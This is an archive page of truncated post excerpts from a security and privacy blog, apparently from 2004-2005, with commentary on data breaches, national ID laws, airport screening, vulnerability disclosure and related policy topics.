Eric Rescorla discusses this account: Officer Primiano expressed extreme frustration with me as soon as I began speaking of my rights to photograph in public places. She wanted to debate the wisdom of my taking pictures and asserted that in the wake of the Sept 11th attacks on our country, I should be more interested […]

 

Two More on Choicepoint

See Taosecurity, on IDS and Choicepoint, and this choice excerpt from Reuters, relayed by Dave Evans at Corante’s Online Dating: U.S. investigators notified the company of the breach in October, but ChoicePoint did not send out the consumer warnings until last week. It’s fascinating that the company didn’t detect the breach, and that they seem […]

 

More on Choicepoint

The Atlanta Journal Constitution (use Bugmenot) reports: “We know that there is a national number that is much larger than that,” said Lt. Paul Denny of the [Los Angeles County] sheriff’s department. “We’ve used the number 400,000, but we’re speculating at this point.” Executives at ChoicePoint, which maintains one of the largest databases of personal […]

 

Felten on The Record Industry

Ed Felten has a great post today, asking “How Competitive Is the Record Industry?” How can we tell whether the record industry is responding competitively to DRM? An interesting natural experiment is about to start. MP3Tunes, a new startup headed by serial entrepreneur Michael Robertson, is launching a new music service that sells songs in […]

 

More on Fighting Terrorist Ideas

I liked how my previous post on this subject read. It was very positive, and I like being positive about the future. (I’m not very good at it.) However, there’s a contrast which needs to be drawn, between the way Yemen (Yemen? Yemen!?!) is handling some prisoners and the way the US is handling some […]

 

How Many Choicepoint Victims Are at Risk?

Choicepoint is a large credit bureau who denies being one. Yesterday, MSNBC reported that “more than 30,000 Californians” had been notified of problems. Now, no one opts-in to Choicepoint. No one can opt-out. They maintain files on you without your knowledge or permission. Now we know that at least 30,000 people were put at risk […]

 

The Real-ID Theft Act of 2005

The “Real ID” act is likely to get written into law, in two ways. First, it will pass the Senate, and be signed into law. Second, it will be one of the best examples of the law of unintended consequences in a long time. The bill would force states* to fingerprint people, and do various […]

 

JAG Heroics

Michael Froomkin applauds those “Military lawyers at the Guantanamo Bay terrorist prison tried to stop inhumane interrogations, but were ignored by senior Pentagon officials.”

 

Purpose of a System Is What it Does?

Over at POSIWID, Richard comments on airline security, with some economic analysis of bad security and why it stays around. (I think I don’t like his title, preferring ‘systems are maintained for what they do,’ which gives more credit to the emergent qualities of systems, but I digress.) He accurately assesses some positives of the […]

 

Dave Eggers and the Pirate Store

By reading this post, you agree not to do anything to get the author or Dave Eggers in trouble, even if those actions that lead to trouble are entirely their own, and you’re just commenting on them, even in a sort of approving way that happens to continue the unfortunate chain of events that were […]

 

What Did TSA Know, and When Did They Know It?

Recently, Slate had an article on how to alter your boarding passes and bypass the silly watch lists. It was picked up by BoingBoing, and it turns out that Bruce Schneier talked about it 18 months ago. Recently, I was talking to a friend who started telling me about…how to alter your boarding passes. What […]

 

Proof Of Concept Code, Boon or Bane

Microsoft has come out swinging against researchers who publish code: Microsoft is concerned that the publishing of proof-of-concept code within hours of the security updates being made available has put customers at increased risk. A common practice among responsible researchers is to wait a reasonable period of time before publishing such code. This generally accepted […]

 

Charlie Wilson's War

I’ve recently finished Charlie Wilson’s War, which Jeff Moss suggested to me. Charlie Wilson was a Congressman from Texas. Gust Avrakotos was a CIA officer. Together, they conspired to get hundreds of millions of dollars funneled to the Afghanistan resistance. The story is simply astounding–at times you think this can’t be true, but it all […]

 

US National ID Card

This was first created in December 2004’s Intelligence bill, loosely called the Patriot II act because it snuck in provisions like this without the Representatives knowing it. The deal is basically a no-option offer to the states: either you issue all your state citizens with nationally approved cards, or all federal employees are instructed to […]

 

Could We Trade Judges?

NPR is reporting that The Bush administration is seeking to justify the imprisonment of an American citizen using secret evidence. The Justice Department has asked a federal judge to throw out the case based on evidence that is being withheld from the man’s lawyers. Perhaps we could trade judges with Yemen. (Via Hit & Run.) […]

 

Security Planning

Gunnar Peterson (who has a new blog) points to the public release of the worksheets from “Misson Critical Security Planner.” I haven’t read that book, but the worksheets look like useful planning documents.

 

Fighting Terrorist Ideas

I believe that the Wahabbi-inspired terrorist strain of Islam represents a great material danger to the ideals of liberty and equality, as well as to free inquiry and science. (The state’s response to this danger also creates a great threat to those goods.) It is thus a pleasure to see a Yemini judge taking to […]

 

Small Bits of Chaos: How to Present, ID Theft Victims List

higB at secureme has good advice for presenters at security cons. Ian G has a good post explaining that government only illegally links their databases when they want to, not when it could help the citizenry. No privacy story is ever truly complete without a tool of the man talking out both sides of their […]

 

Shmoocon Slides

At Shmoocon, Crispin Cowan, Ed Reed, Al Potter and I ran a BOF entitled “Evidence Based Security.” The feedback I got from the audience was all positive. I was hoping that things would have gone more towards the question of what is good evidence, and how you evaluate questions, but that’s the joy of you […]

 

Wachovia Misdirects Customer Information

Wachovia said that, overall, 86 statements or tax forms were mistakenly sent to Pirozzi, including information on 73 individuals. Pirozzi said the number of pieces of mail was significantly higher, closer to 140. … Pirozzi tried desperately to get the problem fixed once the first batch arrived last spring, but he says that no one […]

 

Good Thing We're Checking IDs

Normally, I try hard to bring you only the freshest news. This has been all over the blogosphere, but I can’t resist: Slate on bypassing airport ID checks. [Other commentary on why they’re bad in the “air travel” category of this blog. Are you listening, David Neslon?]

 

Stefan Brands Blogging

Stefan Brands has a new blog. Stefan is not only one of the top two or three folks in the world in privacy enhancing cryptography, but he writes eloquently about the social reasons privacy is important. We worked together at ZKS, and I’m very sad we didn’t get further selling his technology. I look forward […]

 

SSNs and Drivers Licenses

JihadWatch is upset because (9/11 hijacker) Nawaf Alhazmi got a CA drivers license with a fake SSN. But so did 184,000 other people, most of whom have not turned terrorists. Perhaps we should focus on things other than SSN fraud in tracking down terrorists?

 

Top 30 Papers in Infosec

Max Dornseif has a post titled “Top 18 Papers in Information Security,” with 28 papers. But who’s counting? Its a fascinating exercise, and I’m glad to see papers from Phrack. I’d suggest that they define top: Most influential? Most cited? Most important? I do think that no paper which isn’t available to the public via […]

 

Liveblogging Shmoocon: Patching

I’m at Shmoocon, and trying to liveblog a little. There’s network trouble, so it may not quite be live. I’m at Tina Bird’s talk on patching, and she mentioned that in the Teragrid attack, the attackers were hitting supercomputer centers, and there’s some evidence that they were 1) using 0day and 2) using the big […]

 

Vaclav Havel on the EU

For some reason, enemies of Václav Havel want him to waste his astounding moral authority by becoming Secretary General of the UN. I prefer he remain a private citizen, where there is nothing to hold him back from this most elegant dressing down of the European Union: I vividly remember the slightly ludicrous, slightly risqué […]

 

CEOBlogger on "IT Propaganda"

There’s a new blog, from a fellow claiming to be the CEO of a public company, experimenting with blogging. Welcome! In his second post, he responds to the WikID Thoughts, Emergent Chaos, Financial Crypto series on IT breaches, calling it an example of “IT Propaganda.” I love the ‘IT propaganda’ phrase–one of the themes that […]

 

Small Bits: ICANN, Mock Trials, S.116, etc

Ian Grigg and I have a letter to ICANN about Verisign. See his post. Eric Rescorla has a Kafka-esque excerpt from the “trial” of Mustafa Ait Idr, who wasn’t allowed to see the evidence against him. Mort points me to US Senate Bill 166116, introduced by Diane Feinstein, making it a crime to sell social […]

 

A Few Ideas Connected by the Tag "Folksonomy"

Nude Cybot, in an email in which he promises to emerge soon, presumably to be exceptionally cold, mentions that folksonomies have hit Wired News. The Wired article points out that there are more “cat” (16,297) tagged images than “dog” (14,041) in Flickr. But the conclusion they draw from this, “If the photo-sharing site Flickr is […]

 

Eating Your Own Dogfood?

Two posts this morning grabbed my attention. They are “Hide Your Ipod, Here Comes Bill,” (at Wired) and “Sanyo asks workers to buy goods to ease loss” (Hindustan Times via BoingBoing.) In a presentation at Belisarius.com, Chet Richards applies Boyd to business. One of his suggestions, which isn’t new, is to get inside the mind […]

 

Sarbox and Venture Capital

The Sarbanes-Oaxley act is driving up the costs of being a public company. Its driving up both direct costs, in terms of investing in assurance technologies, audit, and new processes to produce (slightly) more reliable accounting. But much more important, it imposes a highly risky cost on CEOs and financial officers who must sign off […]

 

Small Bits: Research, Web Security, Saturn's Moon

Uncle Sam is trying to restrict basic research. This approach comes from such a foreign orientation I’m not even going to comment. Jerimiah Grossman has an article on easy things to do to protect your locally developed application. I still think you should look at your code, but that’s still unfortunately expensive and difficult. Finally, […]

 

Privacy and Obscenity?

Put bluntly, the law of obscenity, no matter how longstanding, has never satisfied constitutional requirements, and it never will. Finally, a judge has been brave enough to say as much. This opinion is notable for that reason – and for Judge Lancaster’s novel approach. His opinion attacks the obscenity laws on privacy grounds – and […]

 

Small Bits of Irony: Secure Flight, Insecure Borders

Bruce Schneier talks about the Secure Flight being an improvement over the current watchlist system, but can’t give us details. The new system will rely on more information in the reservation. But if we don’t have that more information on the person on the watchlist, what will happen? Eg, if there’s no known birthday for […]

 

More on Nothing to Hide

Chapell points out a very interesting correction at the top of this Seattle Times story: A previous version of this story on Tukwila firefighter Lt. Philip Lyons being charged with first-degree attempted arson incorrectly stated that police reports indicated he had used his Safeway Club Card to purchase 16 fire-starters between June and August. Lyons […]

 

Small Bits of Hope

Some moving blog posts from Iraq include Hammorabi, Messopotamian, and Iraq the Model The first thing we saw this morning on our way to the voting center was a convoy of the Iraqi army vehicles patrolling the street, the soldiers were cheering the people marching towards their voting centers then one of the soldiers chanted […]

 

Good Luck to Iraqis!

In tomorrow’s elections. I have to say that despite a great deal of skepticism in the feasibility, and disappointment over the execution, of Bush’s vision for the Middle East, it represents the one of the core American beliefs. Lincoln called the ideas of democracy the last, best hope of mankind, and in that, he was […]

 

New York Times Links

Aaron Swartz has produced a link generator for the New York Times. It takes a URL and makes it archival, so that it doesn’t expire, and you should be able to visit it after two weeks are up. Its a lazy Saturday afternoon; Atlanta is shut down by the half inch of snow that fell […]

 

More on Economic Analysis of Vulnerabilities

Dave Aitel has a new presentation (“0Days: How Hacking Really Works“) on what it costs to attack. The big cost to attackers is not vulnerability discovery, but coding reliable exploits. (There’s an irony for you: Attackers are subject to the same issues with bad software as their victims.) The presentation is in OpenOffice format only […]

 

Small Bits of Chaos: Vidal, SP2, Iraq

Gore Vidal has a few choice words about the President’s Inaugural address, at DemocracyNow. A Russian company, MaxPatrol, has published a paper on bypassing heap and stack protection for Microsoft Windows XP with SP2. Winterspeak has an interesting summary of Iraq: The big bet that President Bush placed all these months ago, the bet that […]

 

Nothing to Hide, Plenty to Fear

Longtime security and privacy researcher Richard M. Smith tells Farber’s IP list about Philip Scott Lyons, a Tukwila, Washington firefighter. Lyons was accused of arson because he’d bought the same type of fire starters at Safeway. Or, that’s what Safeway’s “Club Card” records show. How or why they were obtained isn’t clear. The charge was […]

 

"Analysis of the Texas Instruments DST RFID"

A group at Johns Hopkins and RSA security have interesting new attacks on the RFID chips used in Mobil Speedpass. They’ve put up a web site at http://www.rfidanalysis.org, and gotten some press at the New York Times.   [Edited 29/4/2017 to unlink RFIDanalysis.org because Google claims its distributing malware.]

 

Folksonomies, Tested

I’ve just stumbled across this abstract comparing full-test searching to controlled vocabulary searching. The relevance to Clay’s posts on controlled vocabularies is that our intuitive belief that controlled vocabulary helps searching may be wrong. Unfortunately, the full paper is $30–perhaps someone with an academic library can comment. …In this paper, we focus on an experiment […]

 

Small Bits of Chaos: Brazilian Democracy, Traffic Cameras, Locks, Hamas, and Curtains

Lessig discusses what democracy looks like in Brazil: I remember reading about Jefferson’s complaints about the early White House. Ordinary people would knock on the door, and demand to see the President. Often they did. The presumption of that democracy lives in a sense here. And you never quite see how far from that presumption […]

 

"The Arthur Andersen Of Banking?"

Over at The CounterTerrorism Blog, Andrew Cochran accuses Riggs Bank of being “the Arthur Andersen of banking.” Riggs is apparently pleading guilty to violating the Bank Secrecy Act, by “failing to file reports to regulators on suspicious transfers and withdrawals by clients.” I’d like to address the comparison to Arthur Andersen, and through that lens, […]

 

Small Bits of Chaos: Taxes, Orientation, Liberty, Fraudulent Licenses

Scrivner writes about the perverse nature of the AMT. Chuck Spinney at D-N-I asks “Is America Inside Its Own OODA Loop?” The article contains some very clear writing on the meaning of orientation, and applies that idea: He showed why the most dangerous internal state of an OODA loop occurs when the Orientation process becomes […]

 

Ben Rothke on Best Practices

Best practices look at what everyone else is doing, crunch numbers—and come up with what everyone else is doing. Using the same method, one would conclude that best practices for nutrition mandates a diet high in fat, cholesterol and sugar, with the average male being 35 pounds overweight. Writes Ben Rothke in a short, incisive […]

 

Towards an Economic Analysis of Disclosure

In comments on a my post yesterday, “I Am So A Dinosaur“, Ian asks “Has anyone modelled in economics terms why disclosure is better than the alternate(s) ?” I believe that the answer is no, and so will give it a whack. The costs I see associated with a vulnerability discovery and disclosure, in chronological […]

 

I Am So A Dinosaur…

…and I was one before it was cool. Crit Jarvis responds to my comment that my views on disclosure have ossified by claiming that I’m evolving. The trouble is, I have documented proof it’s not true. From my homepage: Apparent Weaknesses in the Security Dynamics Client Server Protocol. This paper was presented at the DIMACS […]

 

Patterns of Conflict, Easier on the Eyes

I’ve been posting a fair bit about Boyd. Boyd’s wrote very little. Most of his communication was in the form of briefs. At least two of you have publicly admitted to getting the slides, and, if you’re like me, struggled with the form of the presentation: A scan of a typed, hand-annotated presentation book. There’s […]

 

More on Do Security Breaches Matter?

In responding to a question I asked yesterday, Ian Grigg writes: In this case, I think the market is responding to the unknown. In other words, fear. It has long been observed that once a cost is understood, it becomes factored in, and I guess that’s what is happening with DDOS and defacements/viruses/worms. But large […]

 

Small Bits of Chaos: Blind overflows, National ID, and Looney Tunes

SecurityFocus has a new article on blind buffer overflows. I’m glad these techniques are being discussed in the open, rather than in secret. Julian Sanchez has the perfect comment on Congressman Dreier’s new national ID plan, at Hit & Run. And finally, don’t visit this Looney Tunes site if you’re busy. (Via Steven Horowitz at […]

 

Do Security Breaches Matter?

Nick Owen posts about the stock valuation impact of security breaches. This UMD study found that a firm suffering a breach of ‘confidential information’ saw a 5% drop in stock price while firms suffering a non-confidential breach saw no impact. I read it as the market over time learning the difference between a DOS attack […]

 

Catastrophe and Continuation

Dr. David Ozonoff, a professor of environmental health at the Boston University School of Public Health who originally supported the new laboratory but now opposes it, argues that biodefense spending has shifted money away from “bread-and-butter public health concerns.” Given the diversion of resources and the potential for germs to leak or be diverted, he […]

 

California Privacy Law

CIO Magazine has an article “Riding The California Privacy Wave,” reviewing California’s new and pending privacy laws. There’s bits I wasn’t aware of, such as SB 186 168, preventing “businesses from using California residents’ Social Security numbers as unique identifiers.” There’s a slew of new laws in California, a great many of which affect IT […]

 

Economics of Taxonomies

In his latest post on folksonomies, Clay argues that we have no choice about moving to folksonomies, because of the economics. I’d like to tackle those economics a bit. (Some background: There was recently a fascinating exchange between Clay Shirky and Louis Rosenfeld on the subject of taxonomies versus “folksonomies,” lightwieght, uncontrolled terms that users […]

 

Mac Software: Memento

Memento is an application that helps you find web pages you’ve stumbled across and forgotten where the site is. It does this by searching the cache (copies that Safari keeps locally). Very cool, and free.

 

Congrats to David Akin

I first met David Akin when he was covering Zero-Knowledge Systems, where I worked. David was always insightful, and even when he thought he saw us blowing smoke, he was pleasant about it. So I’m both disappointed and excited to see that he “will join CTV’s Ottawa bureau as a Parliamentary Reporter.” I sincerely hope […]

 

Application Layer Vulnerability, an Orientation Issue

Richard Bejtlich comments on a new “@RISK: The Consensus Security Alert“, which starts: “Prediction: This is the year you will see application level attacks mature and proliferate.” He says: You might say that my separation of OS kernel and OS applications doesn’t capture the spirit of SANS’ “prediction.” You might think that their new warning […]

 

All Good Things Must End

Phrackstaff is pleased to bring you _our_ LAST EVER CALL FOR PAPERS for the FINAL RELEASE of PHRACK. … Since 1985, PHRACK MAGAZINE has been providing the hacker community with information on operating systems, network technologies and telephony, as well as relaying features of interest for the international computer underground. PHRACK MAGAZINE is made available […]

 

CCS Industry Track

I’m excited to be a part of the ACM’s 2005 Computer and Communication Security Conference, which has an Industry Track this year. We’re working to foster more interplay and collaboration between industry, the public sector, and academia: The track aims to foster tighter interplay between the demands of real-world security systems and the efforts of […]

 

Secure Programming

Dave Wheeler has a new article out “Call Components Safely.” Developers should take a few minutes to read it.

 

"Just the Standard Rhetoric"

…Iran’s supreme leader, Ayatollah Ali Khamenei, told Muslims making the annual pilgrimage to Mecca that Rushdie was an apostate whose killing would be authorised by Islam, according to the Iranian media. How very reassuring and level-headed of the British to respond by saying: The Foreign Office said: “The key thing from our point of view […]

 

Software Security: What's Your Next Move?

I met Gunnar Peterson after attending one of his talks at BlackHat. It was very well done, and it looks like he’s now offering longer versions. If you’re concerned about the security of your software, and want to improve your development process, you should consider this. If you produce software, and aren’t concerned about the […]

 

Rob Slade Ben Rothke Writes a Positive Review (Forensic Discovery) [Ooops!]

Rob Slade reviews security books. No, more generally, Rob Slade points out in excruciating detail the flaws in security books. So when he I misread a post from ISN and think it says Slade, rather than Rothke, I look like a real fool who can’t find the flaws in my own writing. Really, Ben Rothke, […]

 

Small Bits: Secret Law and Security, Root-Fu, New Blog, and Canadians Stagnate

Cory Doctrow points to a letter he’s sent American Airlines about The security officer then handed me a blank piece of paper and said, “Please write down the names and addresses of everyone you’re staying with in the USA.” and his Kafka-esque experience in trying to find out why they were asking. Good on Cory […]

 

Attackers Are Evolving, Are You?

When I was getting into computer security, back in the dark ages, when Nirvana was releasing albums, hacking was an art. It was passed along in hard to find text ‘philes’, which were a mixture of technology and philosophy. 2600 Magazine remains an example of this sort of old-school hackerdom. The world-view that accompanied the […]

 

Why I Want HTML Export (from Keynote)

Lately, I’ve been complaining that Keynote still can’t export to the web. Now, I’ve been remiss in ensuring all of my writing is in HTML. I’ve been slowly going back and converting things, as I have a few minutes, or as I want to link to something I’ve said. Today, in posting a comment to […]

 

"Thinking WiKID Thougts"

Nick Owen has a new corporate blog up. His very first post is “Why ROI is a crappy measure for Information Security.” I look forward to more.

 

Canada, Land of Rugged Individualists?

Well, for the sake of our non-Canuck visitors, a brief primer is in order. The post 1960’s Canada can be better described as Trudeaupia – a progressive-era dream that just kept on chugging along. The stage in our history where good liberals had become bad Liberals and were well past the point of no return. […]

 

Small Bits of T-Mobile

A friend wrote to T-Mobile and asked if his data was compromised in the T-Mobile break-in. A service droid sent him a press release. My comments are pointed to by the brackets. Customer, Please see the press release below regarding the hacker investigation with T-Mobile’s customer information. If your information was compromised you would have […]

 

Symposium on Usable Privacy And Security CFP

The Symposium on Usable Privacy and Security will be July 6-8 at CMU: The Symposium on Usable Privacy and Security (SOUPS) will bring together an interdisciplinary group of researchers and practitioners in human computer interaction, security, and privacy. The program will feature refereed papers, tutorials, a poster session, panels and invited talks, and discussion sessions.

 

Small Bits of Chaos

The Globe and Mail has a good story on how copyright law is preventing the re-release of “Eyes On the Prize:” The makers of the series no longer have permission for the archival footage they previously used of such key events as the historic protest marches or the confrontations with Southern police. Given Eyes on […]

 

Mac Software Updates

Devosquared has a new release of PowerCard. If you need project management, check this out. It fixes a “bug” where you couldn’t mark days as “weekend.” As a startup person, I’m not sure why that needed fixing, but maybe it matters. Apple has a announced new release of Keynote, which still can’t export to the […]

 

The Iron Fist and the Orange Revolution

There’s a fascinating and moving article in the New York Times about how elements of Ukranian intelligence aided Yushchenko in his bid to overturn the first, fraudulent election: Whether the collaboration was a convergence of political aims, or a pragmatic understanding by the siloviki that Mr. Yushchenko’s prospects were rising, is subject to dispute. Yulia […]

 

Trouble with Surveying Cybercrime

In a comment yesterday, Chris Walsh said: In any case, this should not be a difficult nut to crack, in principle. The US government conducts surveys of businesses all the time, and is capable of obtaining quality samples and high response rates in which academics justly have confidence. In theory, I agree with Chris. In […]

 

Students for an Orwellian Society

These heroic students have made many sacrifices in the name of IngSoc. They stand as a stirring example to us all. They have denounced the crimes of Davis Sos, who promised over 100 IngSoc posters, but have shirked their duty, and squandered the money provided to them. Those students are now hard at work being […]

 

DHS to Survey Cybercrime

In what they hope will become the premier measure of national cybercrime statistics, officials at the Homeland Security and Justice departments plan to survey 36,000 businesses this spring to examine the type and frequency of computer security incidents. This is a really exciting development. DHS seems to be taking a good approach, and in a […]

 

Giving New Meaning to "You Can't Get There From Here"

Microsoft MapPoint helpfully suggests this scenic route from Haugesund, Rogaland, Norway to Trondheim, Sør-Trøndelag, Norway, when asked for the quickest. This route may well be the quickest that includes England, France, Belgium, the Netherlands, Germany, Denmark, and Sweden. James Tyre (who credits David Flint) told Eugene Volokh.

 

More on DNA Dragnet

Chapell nails the “why you might have nothing to hide, but hide anyway” angle: Even more troubling is the possibility that the person who’s DNA was inside this woman may very well have had nothing to do with the crime. But rest assured, that won’t matter to the hundreds of police, FBI, press, and other […]

 

More on TMobile

The LA Times has a story on Jacobsen, the hacker, and the AP has a story with more technical details. The Infosec Potpourri blog has some analysis of the AP story.

 

Model Checking One Million Lines of C Code

Hao Chen, Drew Dean, and David Wagner have a paper of that name in Proceedings of the 11th Annual Network and Distributed System Security Symposium (NDSS), pages 171–185, San Diego, CA, February 2004. Hao Chen’s papers page has powerpoint, PDF and PS, as well as this abstract: Implementation bugs in security-critical software are pervasive. Several […]

 

On Torture

The New York Times reported yesterday that the White House fought for the CIA’s right to torture. In a letter to members of Congress, sent in October and made available by the White House on Wednesday in response to inquiries, Condoleezza Rice, the national security adviser, expressed opposition to the measure on the grounds that […]

 

Small Bits of Chaos

Scrivner points out a basic lack of agreement amongst the pundits: Damn that Bush, cleverly whipping up this fantasy of a threat to scare people into voting for him. … Damn that Bush, ineptly bungling America’s defense against the most dangerous threat Ian has a post about Ron Paul trying to ban the government issuance […]

 

What Makes Good Science?

Over at the Volokh conspiracy, Jim Lindgren writes: Crichton then describes scientific consensuses that turned out to be wrong. I don’t think that there is anything wrong with talking about the consensus of scientists or social scientists (and I certainly do so myself), but one must remember that it is the quality of the evidence […]

 

Financial Cryptography

The conference, not the blog, is now accepting registrations. The program looks really good this year.

 

Hotel Rwanda

I saw Hotel Rwanda this weekend. It’s a true story of a hotel manager who saved over 1,000 people from genocide. If you’ll allow me a moment of disgusted sarcasm, I look forward to the sequel, Hotel Darfur, now in pre-production. The story is the same: No one is bothering to intervene in African genocide, […]

 

T-Mobile

A sophisticated computer hacker had access to servers at wireless giant T-Mobile for at least a year, which he used to monitor U.S. Secret Service e-mail, obtain customers’ passwords and Social Security numbers, and download candid photos taken by Sidekick users, including Hollywood celebrities, SecurityFocus has learned. … T-Mobile, which apparently knew of the intrusions […]

 

Blog Spam

Stefan Geens has a long post on why SixApart’s TypeKey system is not a good solution to blog spam. He points out that the system has bad economies of scale: Here too, the spammer needs to sit down, get a key, pretend to be human for a minute and behave until he gets a comment […]

 

Penny-Wise, Pound-Foolish?

The Supreme Court has just heard a case, Tenet vs Doe, over promises allegedly made to spies: Two former Soviet-bloc diplomats recruited to spy for the CIA during the Cold War say the agency later reneged on promises to compensate them for the dangerous missions they performed.  The husband and wife team are bringing this […]

 

DNA Dragnets and Criminal Signaling

In responding to my comments about Truro’s DNA dragnet, with a fascinating discussion of signaling, Eric Rescorla writes: Even if they’re not the perp, they may have other reasons not to have their DNA collected–for instance they’ve committed another crime that their DNA might match to. (The police say they’re only going to use the […]

 

Private Lives and Psychology

“In a very deep sense, you don’t have a self unless you have a secret, and we all have moments throughout our lives when we feel we’re losing ourselves in our social group, or work or marriage, and it feels good to grab for a secret, or some subterfuge, to reassert our identity as somebody […]

 

Threatcode

In a post to the patch management mailing list, Jay Woody mentions Threatcode, a site dedicated to tracking and shaming badly written code. Cool! I wish the site was a little easier to read, but nice going!

 

Safari

The “back” button is Safari is way too close to the “close” button. Safari would be a much better browser if there was an option to not close (or confirm closing) the window if there are multiple tabs open. Bugger it!

 

Ban Windows, Not Cell Phones

Scrivner has another great post, this one to a study at Virginia Commonwealth University. (My link is to the study, not the press summary Scrivner links.) The press summary claims that rubbernecking accounts for 16% of accidents, looking at scenery or landmarks 10%, while cell phones account for only 5%. Clearly the answer is to […]

 

DNA Dragnet

The city of Truro, Massachusetts is trying to collect DNA from all 790 residents to solve a crime, reports the New York Times. Its not clear why they believe that residents are more likely to be the criminal than non-residents, and it is clear that they don’t get the 4th amendment, against dragnet searches, or […]

 

Economics of Price Discrimination

Scrivner points out that the airlines, masters of price discrimination are giving up: In response they’ve become perhaps the world’s most expert practitioners* of price discrimination, mastering the art of charging the business traveler $1,000 more than the tourist in the next seat in exchange for a short-notice booking with few restrictions. But even that […]

 

Does Ryan Singel Need A Privacy Policy?

Yesterday, I commented that Ryan Singel, in his review of Robert O’Harrow’s* new book, had an Amazon tracking URL. I was mostly noting the irony of aiding tracking in a post titled “Pay Cash for This Book,” but Ryan comments: “it got me to thinking that this site has no privacy policy.” Not to pick […]

 

Framing Effects and Apple

Until I read John Gruber’s latest Daring Fireball on “The Rumor Game,” I was firmly in the “Apple is being Ridiculous” camp, and “Apple is chilling free speech” camp. The essence of the story is Apple is suing a rumors site because they’re leaking product details. What Gruber points out, and a quick Google search […]

 

Presentation of Risk

The Wall Street Journal posted this table today, in an article on how risks are presented. Note the lack of a time scale. Is that a lifetime risk of a heart-attack? Are there lifetime stats for Vioxx takers? How does that risk compare to the risk of winning the lottery? Those odds are (I’m guessing) […]

 

Small Bits of Chaos

Ryan Singel reviews Robert O’Harrow’s new book, No Place To Hide. O’Harrow covered the CAPPS-II and other privacy stories for the Washington Post. In the spirit of the story, I’ve left the little tracking bits from Ryan’s Amazon URL. If you’d like a less tracked version, click here, or type the title into Amazon. There’s […]

 

Help! Mac Project Management Software

I need project management software for a small project (20-50ish tasks, 8-10 people come and go and need to be assigned tasks.) I’d like software that will assign resources to time blocks, handle dependencies, and be easy to use. I’ve spent the morning testing apps, going until I found something either I or the software […]

 

Boyd's Relevance Today

In a comment, Ian Grigg asks, “I haven’t got to the modern stuff yet, so quite what he has to say that is currently relevant eludes me for now.” Over at Defense and the National Interest, there’s an article that draws heavily on Boyd: In a new briefing [1.7 MB PPT], three retired officers—each hailing […]

 

Disclosure

Adam Laurie and company continue to not release code for their Bluetooth attacks, and vendors continue not to fix them. Are we better off, with millions more Bluetooth devices out there? Do we expect that there will be no release of code, and that without POC code, we’re safe? Bluetooth is different from internet vulns, […]

 

Small Bits of Chaos

Ed Felten announced a “Clip Blog,” of short articles with no or small comments. Hmmm. Neat idea. Ian Grigg gives us his thoughts on the Abagnale controversy: [Clausewitz] said something to the extent of “Know yourself and you will win half your battles. Know your enemy and you will win 99 battles out of a […]

 

Boyd

John Boyd was arguably the best fighter pilot in American history. While at the Air Force Fighter weapons school, he was not only undefeated, he won every fight so fast he was known as “Forty second Boyd.” While there, he wrote the “Arial Attack Study,” which transformed the study of fighter combat from an art […]

 

Educated Pat-Downs

Eric Rescorla has two good posts on screening at Educated Guesswork. I’d still like to expand the range of questions, and ask, is intense personal screening effective or needed? Can we use air marshals, different aircraft designs, and armed pilots so that we don’t need to compare rub-downs to millimeter-wave xrays?

 

Small Bits of Chaos

Much as I hate blogging anything from Slashdot, Why the Space Station Almost Ran Out of Food is great. (The previous crew had permission to borrow the current crews’ food, but didn’t record how much they’d eaten.) Maybe they could get jobs working for the Social Security administration. John McWhorter has a new book out, […]

 

Evaluating Security

The study, published in the January issue of the journal Emerging Infectious Diseases, concluded that the estimated $7.55 million spent on [SARS] screening at several Canadian airports failed to detect one case of the disease. … “Sometimes what seems like a reasonable thing to do doesn’t turn out that way,” the report’s lead author, Dr. […]

 

370,000 Absconders

Buried in this story about tracking illegal immigrants is the interesting item that as of early 2003, of 6,000 Muslims who absconded within the US after being told to leave the country, only 38 percent had been found. That left over 3,500 still at large. How many have been caught since then? Where are the […]

 

Ratty Signals

So, we have a security signal that’s available, but not used. Why might that be? Is the market in-efficient, or are there real limitations that I missed? There are a few things that jump to mind: Size of code issues. More code will produce a longer report. Rats produces a line count, but doesn’t issue […]

 

Jihad Watch: Muslims claim unfair treatment at Canadian border

I’ve been debating if I should respond to this idea of unlimited searches of Muslims again, and realized that there’s a perhaps interesting analogy. JihadWatch quotes an AP story BUFFALO, N.Y. — An Islamic civil rights group Wednesday accused U.S. border agents of religious profiling after dozens of American Muslims were searched, fingerprinted and photographed […]

 

Quick Links

Cory points to another example of anti-consumer activity, this time Apple disabling the high quality audio-in on the ipod. How to fix it at Hack-a-day. Also via Hack-a-day is the paper Enigma machine Scrivner discovers that Uncle Sam admits to cooking the books, in a way that the SEC would never tolerate from a public […]

 

Cory vs DRM

Cory Doctrow posts a delicious rant against Wired’s review policy here. Unfortunately, he fails to stress what I think is the a point. Wired is writing reviews. Those reviews are supposed to be impartial. Whatever you may think about DRM, it is clearly an important mis-feature of a product which you may buy. Informed reviewers, […]

 

Congratulations to Mozilla

I’ve always believed that my readers are smarter and better looking than average, and now I have proof. Yesterday, for the first time, over half (50.3%) of the visitors to this site were using Mozilla or Firefox. (As summarized by AWStats.)     Browsers Grabber Hits Percent Mozilla No 10308 31.4 % Unknown ? 9786 […]

 

Quick Links

John Robb has an article at Global Guerrillas about the cost of terrorist attacks and their impact on the economic equilibria at work in cities, based on a report by the NY Fed. A terrorism tax is an accumulation of excess costs inflicted on a city’s stakeholders by acts of terrorism.  These include direct costs […]

 

More on ROI

You can get ROI from security solutions by automating manual processes. Patch management and automated password resets are two solutions that don’t need “incidents” to gain a return. says Pete Lindstrom, responding to my comments that: Well, of course. ROI has enormous problems, including an assumption that technology works out, that there’s an infinite pool […]

 

Biased Reporting

News.com has an article entitled “Craigslist costing newspapers millions. Which is nominally accurate, but a better title would be “Craigslist saving consumers millions.” Craigslist, which generates more than 1 billion page-views each month, also has cost the newspapers millions more in merchandise and real estate advertising, and has damaged other traditional classified advertising businesses, according […]

 

Talking is Tough

Anyone who talks to journalists to provide background or commentary says things that they wish they hadn’t. This is in contrast to when you’re making news, and can plan what you want to say, and it’s easier to stay “on message.” Kudos to Bruce for owning up to it. I’m sure I said that, but […]

 

Yushchenko!

With Yushchenko at 52% of the votes to Yanukovich’s 44%, it seems likely that he Yushchenko will be the next leader of the Ukraine. Congratulations to all who stood up for a fair and honest vote. Oh, and it means I can get a nicer stylesheet in place, too.

 

Froomkin 1, Treasury 0

Michael Froomkin sees the idea of the secretary of the treasury investing the social security trust fund, and finds it wanting.

 

The Intent of a Tank

